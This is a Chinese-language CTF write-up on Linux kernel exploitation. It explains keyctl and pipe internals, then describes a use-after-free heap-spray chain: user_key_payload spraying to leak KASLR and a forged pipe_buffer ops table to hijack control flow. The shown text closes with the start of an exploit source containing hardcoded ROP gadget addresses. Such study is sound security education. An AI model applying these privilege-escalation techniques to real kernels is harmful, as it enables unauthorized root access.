其大致功能就是对于我们add_key所获得的key_id来操纵该key,系统调用如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
/*
* The key control system call
*/
SYSCALL_DEFINE5(keyctl, int, option, unsigned long, arg2, unsigned long, arg3,
unsigned long, arg4, unsigned long, arg5)
{
switch (option) {
...

case KEYCTL_UPDATE:
return keyctl_update_key((key_serial_t) arg2,
(const void __user *) arg3,
(size_t) arg4);

case KEYCTL_REVOKE:
return keyctl_revoke_key((key_serial_t) arg2);

...

case KEYCTL_READ:
return keyctl_read_key((key_serial_t) arg2,
(char __user *) arg3,
(size_t) arg4);

case KEYCTL_UNLINK:
return keyctl_keyring_unlink((key_serial_t) arg2,
(key_serial_t) arg3);

...

default:
return -EOPNOTSUPP;
}
}

:one:KEYCTL_UPDATE

首先该选项会调用key_update_key函数,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
/*
* Update a key's data payload from the given data.
*
* The key must grant the caller Write permission and the key type must support
* updating for this to work. A negative key can be positively instantiated
* with this call.
*
* If successful, 0 will be returned. If the key type does not support
* updating, then -EOPNOTSUPP will be returned.
*/
long keyctl_update_key(key_serial_t id,
const void __user *_payload,
size_t plen)
{
key_ref_t key_ref;
void *payload;
long ret;

ret = -EINVAL;
if (plen > PAGE_SIZE)
goto error;

/* pull the payload in if one was supplied */
payload = NULL;
if (plen) {
ret = -ENOMEM;
payload = kvmalloc(plen, GFP_KERNEL); //分配临时payload
if (!payload)
goto error;

ret = -EFAULT;
if (copy_from_user(payload, _payload, plen) != 0)
goto error2;
}

...

/* update the key */
ret = key_update(key_ref, payload, plen);

...

return ret;
}

该函数首先分配一个临时堆块来存放payload,然后传入key_update核心处理函数,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
/**
* key_update - Update a key's contents.
* @key_ref: The pointer (plus possession flag) to the key.
* @payload: The data to be used to update the key.
* @plen: The length of @payload.
*
* Attempt to update the contents of a key with the given payload data. The
* caller must be granted Write permission on the key. Negative keys can be
* instantiated by this method.
*
* Returns 0 on success, -EACCES if not permitted and -EOPNOTSUPP if the key
* type does not support updating. The key type may return other errors.
*/
int key_update(key_ref_t key_ref, const void *payload, size_t plen)
{
struct key_preparsed_payload prep;
struct key *key = key_ref_to_ptr(key_ref);
int ret;

key_check(key);

/* 该key必须可写 */
ret = key_permission(key_ref, KEY_NEED_WRITE);
if (ret < 0)
return ret;

/* 尝试更新 */
if (!key->type->update)
return -EOPNOTSUPP;

memset(&prep, 0, sizeof(prep));
prep.data = payload;
prep.datalen = plen;
prep.quotalen = key->type->def_datalen;
prep.expiry = TIME64_MAX;
if (key->type->preparse) {
ret = key->type->preparse(&prep); //类似前面user_key_payload分配,也就是在prep的payload字段附上我们新的user_key_payload
if (ret < 0)
goto error;
}

down_write(&key->sem);

ret = key->type->update(key, &prep);

...

}

我们可以看到上面的最后一行,在我们调用完key->type->preparse(&prep),再调用key->type->update,它对应user_update函数,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
/*
* update a user defined key
* - the key's semaphore is write-locked
*/
int user_update(struct key *key, struct key_preparsed_payload *prep)
{
struct user_key_payload *zap = NULL;
int ret;

/* check the quota and attach the new data */
ret = key_payload_reserve(key, prep->datalen);
if (ret < 0)
return ret;

/* attach the new data, displacing the old */
key->expiry = prep->expiry;
if (key_is_positive(key))
zap = dereference_key_locked(key);
rcu_assign_keypointer(key, prep->payload.data[0]);
prep->payload.data[0] = NULL;

if (zap)
call_rcu(&zap->rcu, user_free_payload_rcu);
return ret;
}

#define rcu_assign_keypointer(KEY, PAYLOAD) \
do { \
rcu_assign_pointer((KEY)->payload.rcu_data0, (PAYLOAD)); \
} while (0)

#define rcu_assign_pointer(p, v) do { (p) = (v); } while (0)

上面函数可以看到我们是将prep->payload.data[0],也就是我们新分配的user_key_payload赋值给key->payload.rcu_data0,这也就实现了我们的key更新,在这之后我们同样恰当的将临时存放user_key_payload的指针置空。

这里总结一下更新操作:

  1. keyctl_update_key首先分配一个临时object来存放我们传入的新payload,大小同样是我们传入的plen,然后调用key_update
  2. key_update首先调用user_preparse(type为”user”的前提下,下面类似),分配新的user_key_payload来存放,然后调用user_update来将payload指针更新
  3. 返回到keyctl_update_key,释放掉临时payload

:two:KEYCTL_REVOKE

该选项调用keyctl_revoke_key函数,具体功能是唤醒一个key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/*
* Revoke a key.
*
* The key must be grant the caller Write or Setattr permission for this to
* work. The key type should give up its quota claim when revoked. The key
* and any links to the key will be automatically garbage collected after a
* certain amount of time (/proc/sys/kernel/keys/gc_delay).
*
* Keys with KEY_FLAG_KEEP set should not be revoked.
*
* If successful, 0 is returned.
*/
long keyctl_revoke_key(key_serial_t id)
{
...
if (test_bit(KEY_FLAG_KEEP, &key->flags))
ret = -EPERM;
else
key_revoke(key);

key_ref_put(key_ref);
error:
return ret;
}

其会调用key_revoke函数,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

/**
* key_revoke - Revoke a key.
* @key: The key to be revoked.
*
* Mark a key as being revoked and ask the type to free up its resources. The
* revocation timeout is set and the key and all its links will be
* automatically garbage collected after key_gc_delay amount of time if they
* are not manually dealt with first.
*/
void key_revoke(struct key *key)
{

...
down_write_nested(&key->sem, 1);
if (!test_and_set_bit(KEY_FLAG_REVOKED, &key->flags)) {
notify_key(key, NOTIFY_KEY_REVOKED, 0);
if (key->type->revoke)
key->type->revoke(key);

...
}

函数会调用key->type->revoke(&key),其对应函数user_revoke

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/*
* dispose of the links from a revoked keyring
* - called with the key sem write-locked
*/
void user_revoke(struct key *key)
{
struct user_key_payload *upayload = user_key_payload_locked(key);

/* clear the quota */
key_payload_reserve(key, 0);

if (upayload) {
rcu_assign_keypointer(key, NULL); //这里将我们key里面存放的user_key_payload置空
call_rcu(&upayload->rcu, user_free_payload_rcu); //释放原先的user_key_payload
}
}

:three:KEYCTL_READ

泄露来力!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
/*
* Read a key's payload.
*
* The key must either grant the caller Read permission, or it must grant the
* caller Search permission when searched for from the process keyrings.
*
* If successful, we place up to buflen bytes of data into the buffer, if one
* is provided, and return the amount of data that is available in the key,
* irrespective of how much we copied into the buffer.
*/
long keyctl_read_key(key_serial_t keyid, char __user *buffer, size_t buflen)
{
struct key *key;
key_ref_t key_ref;
long ret;
char *key_data = NULL;
size_t key_data_len;

...

key_data_len = (buflen <= PAGE_SIZE) ? buflen : 0;
for (;;) {
if (key_data_len) {
key_data = kvmalloc(key_data_len, GFP_KERNEL); //分配一个key_data_len的堆块
if (!key_data) {
ret = -ENOMEM;
goto key_put_out;
}
}

ret = __keyctl_read_key(key, key_data, key_data_len); //调用user_read函数,他会将我们原来的payload内容复制到key_data里面

/*
* Read methods will just return the required length without
* any copying if the provided length isn't large enough.
*/
if (ret <= 0 || ret > buflen)
break;

/*
* The key may change (unlikely) in between 2 consecutive
* __keyctl_read_key() calls. In this case, we reallocate
* a larger buffer and redo the key read when
* key_data_len < ret <= buflen.
*/
if (ret > key_data_len) {
if (unlikely(key_data))
kvfree_sensitive(key_data, key_data_len);
key_data_len = ret;
continue; /* Allocate buffer */
}

if (copy_to_user(buffer, key_data, ret))
ret = -EFAULT;
break;
}
kvfree_sensitive(key_data, key_data_len);

key_put_out:
key_put(key);
out:
return ret;
}

调用了user_key函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/*
* read the key data
* - the key's semaphore is read-locked
*/
long user_read(const struct key *key, char *buffer, size_t buflen)
{
const struct user_key_payload *upayload;
long ret;

upayload = user_key_payload_locked(key); //获取key的user_key_payload
ret = upayload->datalen;

/* we can return the data as is */
if (buffer && buflen > 0) {
if (buflen > upayload->datalen)
buflen = upayload->datalen;

memcpy(buffer, upayload->data, buflen);
}

return ret;
}

其逻辑大概就是,keyctl_read_key首先分配一个临时堆块,然后将我们key里面的payload读入到该临时堆块当中,读多少取决于user_key_payload当中的datalen和自身的buflen,读完后,再调用copy_to_user来复制到我们的buf当中,最后释放该临时堆块,这里的返回值位upload->datalen

从keyring当中注销一个key,这个倒没什么好讲的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
/*
* Unlink a key from a keyring.
*
* The keyring must grant the caller Write permission for this to work; the key
* itself need not grant the caller anything. If the last link to a key is
* removed then that key will be scheduled for destruction.
*
* Keys or keyrings with KEY_FLAG_KEEP set should not be unlinked.
*
* If successful, 0 will be returned.
*/
long keyctl_keyring_unlink(key_serial_t id, key_serial_t ringid)
{
key_ref_t keyring_ref, key_ref;
struct key *keyring, *key;
long ret;

keyring_ref = lookup_user_key(ringid, 0, KEY_NEED_WRITE);
if (IS_ERR(keyring_ref)) {
ret = PTR_ERR(keyring_ref);
goto error;
}

key_ref = lookup_user_key(id, KEY_LOOKUP_PARTIAL, KEY_NEED_UNLINK);
if (IS_ERR(key_ref)) {
ret = PTR_ERR(key_ref);
goto error2;
}

keyring = key_ref_to_ptr(keyring_ref);
key = key_ref_to_ptr(key_ref);
if (test_bit(KEY_FLAG_KEEP, &keyring->flags) &&
test_bit(KEY_FLAG_KEEP, &key->flags))
ret = -EPERM;
else
ret = key_unlink(keyring, key);

key_ref_put(key_ref);
error2:
key_ref_put(keyring_ref);
error:
return ret;
}

4.板子

方便使用user_key_payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#include <sys/keyctl.h>
#define KEY_SPEC_PROCESS_KEYRING -2 /* - key ID for process-specific keyring */

/* keyctl commands */
#define KEYCTL_UPDATE 2 /* update a key */
#define KEYCTL_REVOKE 3 /* revoke a key */
#define KEYCTL_UNLINK 9 /* unlink a key from a keyring */
#define KEYCTL_READ 11 /* read a key or keyring's contents */

int key_alloc(char* description, void* payload, size_t plen){
return syscall(_NR_add_key, "user", description, payload, plen, KEY_SPEC_PROCESS_KEYRING);
}
int key_update(int id, void* payload, size_t plen){
return syscall(_NR_keyctl, KEYCTL_UPDATE, id, payload, plen, NULL);
}
int key_revoke(int id){
return syscall(_NR_keyctl, KEYCTL_REVOKE, id, NULL, NULL, NULL);
}
int key_read(int id, void* payload, size_t plen){
return syscall(_NR_keyctl, KEYCTL_READ, id, payload, plen, NULL);
}
int key_unlink(int id){
return syscall(_NR_keyctl, KEYCTL_UNLINK, id, KEY_SPEC_PROCESS_KEYRING, NULL, NULL);
}

5.pipe基础知识

这里为了继续进行咱们的利用,还需要学习一个新的结构体,那就是pipe,他被实现为一个系统调用,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
IPE(2)                                                                                            Linux Programmer's Manual                                                                                            PIPE(2)

NAME
pipe, pipe2 - create pipe

SYNOPSIS
#include <unistd.h>

/* On Alpha, IA-64, MIPS, SuperH, and SPARC/SPARC64; see NOTES */
struct fd_pair {
long fd[2];
};
struct fd_pair pipe();

/* On all other architectures */
int pipe(int pipefd[2]);

#define _GNU_SOURCE /* See feature_test_macros(7) */
#include <fcntl.h> /* Obtain O_* constant definitions */
#include <unistd.h>

int pipe2(int pipefd[2], int flags);

DESCRIPTION
pipe() creates a pipe, a unidirectional data channel that can be used for interprocess communication. The array pipefd is used to return two file descriptors referring to the ends of the pipe. pipefd[0] refers to
the read end of the pipe. pipefd[1] refers to the write end of the pipe. Data written to the write end of the pipe is buffered by the kernel until it is read from the read end of the pipe. For further details, see
pipe(7).

If flags is 0, then pipe2() is the same as pipe(). The following values can be bitwise ORed in flags to obtain different behavior:

说到这个管道,我们对他的第一印象那肯定是进程之间的交互,不妨我们往深处想一想他的原理,我们该如何使得两个进程有信息交换呢?一种无非是创建一个文件,然后两个进程分别往里面读写,这是一种可行的方式,而如果我们不采用与硬盘联系的方式呢,因为与硬盘交互太累了并且也太慢,所以我们转头可以到他的内核方向去想,因为每个进程的用户空间不同,但是内核空间都是相同的,那么我们就可以在内核中开辟一段空间,使得我们不同的进程可以同时访问,这就使得两者之间存在了一个通讯的桥梁,也被称作管道。

他的使用方法我们可以查看linux手册,十分方便。大致意思就是,在内核空间创建一个虚拟的inode,该inode一般是作为文件指针以及描述文件的功能而存在,这里仅仅是凭空创建,并不设计文件的产生。创建完inode后,则将当前进程的一个文件描述符赋值,具体赋值写描述符还是读描述符则靠程序员自身指定,一般pipe_fd[0]为读指针,pipe_fd[1]为写指针,手册里面的实例更类似于匿名管道(可能有错误

接下来我们在源码层面来深入了解一下其利用点

首先我们需要找到pipe系统调用的一个源码,它位于fs/pipe.c当中,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

/*
* sys_pipe() is the normal C calling standard for creating
* a pipe. It's not the way Unix traditionally does this, though.
*/
static int do_pipe2(int __user *fildes, int flags)
{
struct file *files[2];
int fd[2];
int error;

error = __do_pipe_flags(fd, files, flags);
if (!error) {
if (unlikely(copy_to_user(fildes, fd, sizeof(fd)))) {
fput(files[0]);
fput(files[1]);
put_unused_fd(fd[0]);
put_unused_fd(fd[1]);
error = -EFAULT;
} else {
fd_install(fd[0], files[0]);
fd_install(fd[1], files[1]);
}
}
return error;
}

SYSCALL_DEFINE2(pipe2, int __user *, fildes, int, flags)
{
return do_pipe2(fildes, flags);
}

SYSCALL_DEFINE1(pipe, int __user *, fildes)
{
return do_pipe2(fildes, 0);
}

他分为两种pipe系统调用,分别为pipepipe2,其区别就是flags的区别,最终调用了do_pipe2函数,其调用链如下:

1
2
3
4
5
6
7
do_pipe2
__do_pipe_flags
create_pipe_files
get_pipe_inode //对于该管道inode的fops赋值为pipefifo_fops
alloc_pipe_info
kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT
kcalloc(pipe_bufs, sizeof(struct pipe_buffer), GFP_KERNEL_ACCOUNT)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
struct pipe_inode_info *alloc_pipe_info(void)
{
struct pipe_inode_info *pipe;
unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
struct user_struct *user = get_current_user();
unsigned long user_bufs;
unsigned int max_size = READ_ONCE(pipe_max_size);

pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);

...

pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer), GFP_KERNEL_ACCOUNT);

...
}

#define PIPE_DEF_BUFFERS 16

可以看到最终的链条会分配一个pipe_inode_info大小的结构体,他的块会从kmalloc-192入手,

pipe_inode_info

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
/**
* struct pipe_inode_info - a linux kernel pipe
* @mutex: mutex protecting the whole thing
* @rd_wait: reader wait point in case of empty pipe
* @wr_wait: writer wait point in case of full pipe
* @head: The point of buffer production
* @tail: The point of buffer consumption
* @note_loss: The next read() should insert a data-lost message
* @max_usage: The maximum number of slots that may be used in the ring
* @ring_size: total number of buffers (should be a power of 2)
* @nr_accounted: The amount this pipe accounts for in user->pipe_bufs
* @tmp_page: cached released page
* @readers: number of current readers of this pipe
* @writers: number of current writers of this pipe
* @files: number of struct file referring this pipe (protected by ->i_lock)
* @r_counter: reader counter
* @w_counter: writer counter
* @poll_usage: is this pipe used for epoll, which has crazy wakeups?
* @fasync_readers: reader side fasync
* @fasync_writers: writer side fasync
* @bufs: the circular array of pipe buffers
* @user: the user who created this pipe
* @watch_queue: If this pipe is a watch_queue, this is the stuff for that
**/
struct pipe_inode_info {
struct mutex mutex;
wait_queue_head_t rd_wait, wr_wait;
unsigned int head;
unsigned int tail;
unsigned int max_usage;
unsigned int ring_size;
#ifdef CONFIG_WATCH_QUEUE
bool note_loss;
#endif
unsigned int nr_accounted;
unsigned int readers;
unsigned int writers;
unsigned int files;
unsigned int r_counter;
unsigned int w_counter;
bool poll_usage;
struct page *tmp_page;
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
struct pipe_buffer *bufs; //存放pipe_buffer数组
struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
struct watch_queue *watch_queue;
#endif
};

pipe_buffer

然后调用kcalloc分配pipe_buffer,分配块大小为pipe_bufs * sizeof(struct pipe_buffer),其中pipe_bufs默认为16,他将会从kmalloc-1k进行取obj,所以如果我们控制了pipe_inode_info,那么我们就可以获取该动态分配的堆块值,也就是pipe_inode_info->bufs

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/**
* struct pipe_buffer - a linux kernel pipe buffer
* @page: the page containing the data for the pipe buffer
* @offset: offset of data inside the @page
* @len: length of data inside the @page
* @ops: operations associated with this buffer. See @pipe_buf_operations.
* @flags: pipe buffer flags. See above.
* @private: private data owned by the ops.
**/
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

上述结构体可以保证我们泄露出内核堆地址,但这还不够,我们甚至可以利用它来控制执行流,

下面来分析该pipe的释放过程:

我们上面知道,管道创建后有两个文件描述符,一个读一个写,所以当这两个文件描述符都被关闭的时候就会正式的关闭管道

要分析资源释放的过程,我们需要知道他的释放函数,当我们释放文件描述符的时候,程序员并不会管你这个文件是管道还是什么,与关闭其他文件唯一不同的就是inode的释放函数,我们在上面获取pipe的途中调用了get_pipe_inode,其中便对于其指针进行了赋值,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static struct inode * get_pipe_inode(void)
{
struct inode *inode = new_inode_pseudo(pipe_mnt->mnt_sb);
struct pipe_inode_info *pipe;

...

inode->i_fop = &pipefifo_fops;

...
}

const struct file_operations pipefifo_fops = {
.open = fifo_open,
.llseek = no_llseek,
.read_iter = pipe_read,
.write_iter = pipe_write,
.poll = pipe_poll,
.unlocked_ioctl = pipe_ioctl,
.release = pipe_release,
.fasync = pipe_fasync,
.splice_write = iter_file_splice_write,
};

可以知道该管道的release函数指针被赋值为pipe_release函数,其调用链如下:

1
2
3
4
5
pipe_release
put_pipe_info
free_pipe_info
pipe_buf_release
pipe_buffer.ops->release(pipe_buf_release)

可以看到最终是调用了pipe_buffer.ops上的函数,因此如果我们可以修改pipe_buffer上面的函数表,那么我们就可以在释放管道两个文件的时候成功的控制我们的程序流

pipe_buf_operations

下面是pipe_buffer的函数表:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
/*
* Note on the nesting of these functions:
*
* ->confirm()
* ->try_steal()
*
* That is, ->try_steal() must be called on a confirmed buffer. See below for
* the meaning of each operation. Also see the kerneldoc in fs/pipe.c for the
* pipe and generic variants of these hooks.
*/
struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
bool (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
bool (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

6.漏洞利用

前面铺垫了一大段相关知识,总算是可以到我们的正题了,回忆一下题目中的条件

  1. 存在ioctl系统调用,其中根据我们传递的cmd来判断,如果是0xdeadbeef,则分配堆块,若是0xc0decafe,则释放堆块,且该释放堆块存在悬垂指针,也就是有UAF
  2. 堆块存放的idx只能为0或1
  3. 题目开启kalsr,smep/smap,kpti

我们首先需要考虑的是地址泄露

地址泄露

我们利用到堆喷的思路以及add_key系统调用的利用,当我们在利用add_key来获取了一个key_id的时候,我们就可以通过keyctl系统调用来对他进行操作,其中的详细部分可以参考上面所讲。

当key中的payload被释放过后,其中的user_key_payload->rcu->callback_head函数指针会被修改为user_free_payload_rcu,而他是一个全局变量,所以当我们释放过后通过UAF漏洞就可以泄露出内核的基地址了,

下面便是本题当中内核堆喷以及泄露的详细过程:

  1. 首先构建UAF obj,也就是说利用漏洞模块中的ioctl来创建一个obj并释放掉他,此时我们要注意到该obj的指针是并没有置空的,我们仍可以继续使用,并且这里的大小为了配合后面的add_key系统调用,所以统一分配kmalloc-192(这里使用别的也可以
  2. 堆喷user_key_payload,由于我们知道,add_key系统调用需要先临时分配一个obj来存放payload,然后再分配一个(payload+head)的obj来存放user_key_payload,最后再释放掉上面一个临时堆块,所以我们的UAF obj会不停的被分配为临时payload然后释放,这将导致我们一直无法使得UAF obj被分配成user_key_payload
  3. 步骤2中的情况一直持续到该slab全被耗空,此时假设slab当中就只剩下刚刚释放掉的临时堆块,此时我们再次add_key,这将导致UAF obj再次被分配为临时payload,但是,这里发现该slab没有剩余的obj来分配给user_key_payload,那么题目会把当前正在使用的slab存放回slab当中,并且从kmem_cache_node中搜寻partial slab来放置回kmem_cache_cpu->freelist当中,这样一来我们的user_key_payload将从新的slab当中分配,分配完毕后,我们的临时payload,也就是UAF obj将被放回node当中作为partial slab存在
  4. 我们继续堆喷user_key_payload,与上面的堆喷有所不同的是,此次的临时存放payload的obj将不再使用UAF obj进行分配,因为此时的UAF obj不在cpu->freelist下,而是在node当中,因此同样当我们堆喷到slab当中只存在一个唯一的刚刚释放的临时payload堆块时,我们将从node中搜寻partial slab来进行分配,而我们刚刚置入node的那个partial slab就是存放着咱们空闲UAF obj的那个slab,因此此时将会把刚刚那个partial slab作为咱们新的cpu->freelist来进行分配,所以就达成了将我们的UAF obj分配为user_key_payload的过程
  5. 此时我们为了之后可以成功泄露出基地址,这里我们需要将UAF obj所在的user_key_payload的head中datalen修改为更大的值,从而使得在keyctl_read的时候可以读到其他user_key_payload的值,而其他user_key_payload如果释放掉了payload,那么就可以从中泄露出基地址,所以此时我们首先释放UAF obj,然后开始利用漏洞模块的ioctl来进行堆喷,其中传入的buf对应user_key_payload的datalen字段的部分需要我们改大,此时当我们成功分配到之前释放的UAF obj的时候,就会将其对应的user_key_payload中的datalen进行修改
  6. 经过步骤五,我们已经将user_key_payload的datalen字段修改,但我们如何找到对应的key_id来进行泄露呢,这里有个keyctl_read,当我们读入buf之后,他的返回值不难分析得知就是user_key_payload->datalen,所以我们可以通过循环遍历,若该值大于我们之前分配的192,那么就说明他就是我们刚刚利用UAF obj改过的user_key_payload,在遍历的过程中,我们把其他的payload都利用keyctl_revoke进行释放,这样一来我们就可以通过越界读victim user_key_payload来读取其他payload头当中的全局指针了

控制流劫持

我们在这里利用pipe进行劫持

当我们创建一个pipe管道过后,由上面的源码可以得知,在分配pipe的过程当中,他会从kmalloc-192当中分配一个pipe_inode_info结构体,并且在pipe_inode_info->bufs字段分配一个pipe_buffer数组(这里就可以说明他包含泄露内核堆地址的功能),从kmalloc-1k当中分配,并且当我们释放掉管道的两端的时候,就会调用pipe_buffer中*ops表的release()函数,这里我们就可以伪造他的一个函数表进行控制,下面是详细步骤

  1. 利用两个可以共存在漏洞模块数组的堆块,我们可以轻松的将obj1分配为一个user_key_payload,这里是为了pipe_inode_info所生成
  2. 然后我们分配obj0为一个1024的大块,将从kmalloc-1k中获取,然后释放掉他,这保证了我们之后分配pipe_buffer将会利用该obj进行分配,同时也释放掉obj1,这里的理由一致
  3. 调用pipe系统调用,这将使得我们obj0,obj1分别被分配为pipe_buffer和pipe_inode_info
  4. 此时我们的pipe_inode_info和user_key_payload都同时使用一个obj1进行分配,此时我们调用keyctl_read,传入size为0xffff来读我们二点pipe_inode_info,这将使得我们obj1中对应datalen字段变大,但经过测试是0x2000左右,此时我们就可以通过他来知道我们pipe_buffer的地址,然后我们此时可以通过释放obj0,分配obj0来达成修改pipe_buffer并且在上面伪造函数表的功能
  5. 最后释放两个文件描述符,来达成我们的提权

这里的gadgets寻找十分困难,在内核中寻找gadget不同于以往,uesrland中的gadgets可能普遍较短就可以使用,但是内核的话在一般使用ROPgadget,ropper等无法寻找到相应堆块,因为按照国资师傅所说,gadget的列出是按照rip的改变作为结束点的,大概就是主动修改rip作为结束,所以在一些内核中较长的gadgets,涉及到多次rip变换就无法显现,奇怪的是利用objdump同样无法显出,因此经过mole师傅的指点,可以利用ROPgadget的另一个功能

1
ROPgadget --binary<文件名> --opcode <16进制汇编码>

还有个注意点那就是pipe_inode_info中,bufs字段的偏移为0x98,经过调试可以得出

本题实际上在控制流劫持当中就可以看出有更简便的方法,但是本节的主要部分是学习堆喷的步骤,因此就按着arttnba3师傅的节奏来

以下是exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <sys/mman.h>
#include <syscall.h>
#include <poll.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <errno.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <sys/syscall.h>

#define PIPE_NODE_INFO_SZ 192
#define PIPE_BUFFER_SZ 1024
#define KEY_SPRAY_NUM 40

#define USER_FREE_PAYLOAD_RCU 0xffffffff813d8210
#define POP_RBX_POP_RBP_POP_R12_RET 0xffffffff81250ca4
#define PUSH_RSI_POP_RSP_POP_RBX_POP_RBP_POP_R12_RET 0xffffffff81250c9d
#define POP_RDI_RET 0xffffffff8106ab4d
#define XCHG_RDI_RAX_DEC_RET 0xffffffff81adfc70
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMDOE 0xffffffff81e00ed0

#define KEY_SPEC_PROCESS_KEYRING -2 /* - key ID for process-specific keyring */

/* keyctl commands */
#define KEYCTL_UPDATE 2 /* update a key */
#define KEYCTL_REVOKE 3 /* revoke a key */
#define KEYCTL_UNLINK 9 /* unlink a key from a keyring */
#define KEYCTL_READ 11 /* read a key or keyring's contents */
size_t kernel_base = 0xffffffffc0000000;


int rwctf_fd;
size_t commit_creds = 0xffffffff81095c30;
size_t prepare_kernel_cred = 0xffffffff81096110;

struct userarg{
uint32_t idx;
uint32_t size;
void* buf;
};


#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:%p\n", str, x)

void saveStatus();
void info_log(char*);
void error_log(char*);
int key_alloc(char*, void*, size_t);

size_t user_cs, user_ss,user_rflags,user_sp;


void saveStatus(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
info_log("States has been saved successfully!");
}


/* to run the exp on the specific core only */
void bind_cpu(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
info_log("bind core succesfully");
}

void info_log(char* str){
printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
printf("\033[0m\033[1;31m[-]%s\033[0m\n",str);
printf("hello\n");
exit(0);
}

void my_alloc(uint32_t idx, uint32_t size, void* buf){
struct userarg n = {
.idx = idx,
.size = size,
.buf = buf,
};
ioctl(rwctf_fd, 0xDEADBEEF, &n);
}

void my_delete(uint32_t idx){
struct userarg n = {
.idx = idx,
};
ioctl(rwctf_fd, 0xC0DECAFE, &n);
}

int key_alloc(char* description, void* payload, size_t plen){
